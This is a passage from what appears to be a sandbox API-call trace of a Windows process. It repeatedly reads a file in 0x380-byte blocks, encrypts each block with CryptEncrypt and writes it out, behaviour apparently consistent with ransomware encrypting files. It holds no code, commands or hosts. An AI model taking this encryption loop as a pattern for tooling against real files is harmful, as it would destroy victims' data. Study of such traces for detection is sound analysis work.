hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.138] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.138] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.139] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.139] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.139] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.139] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.139] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.139] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.139] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.139] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.139] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.139] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.139] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.139] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.139] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.139] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.140] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.140] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.140] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.140] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.140] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.140] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.140] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.140] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.140] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.140] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.141] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.141] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.141] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.141] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.141] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.141] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.141] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.141] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.141] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.141] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.141] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.141] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.141] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.142] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.142] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.142] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.142] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.142] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.142] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.142] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.142] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.142] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.142] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.142] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.142] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.142] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.142] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.142] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.143] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.143] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.143] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.143] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.143] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.143] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.143] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.143] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.143] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.143] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.143] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.143] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.143] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.143] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.144] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.144] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.144] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.144] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.144] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.144] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.144] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.144] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.144] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.144] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.144] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.144] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.144] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.144] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.145] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.145] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.145] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.145] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.145] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.145] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.145] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.145] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.145] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.145] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.145] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.145] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.145] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.145] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.145] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, 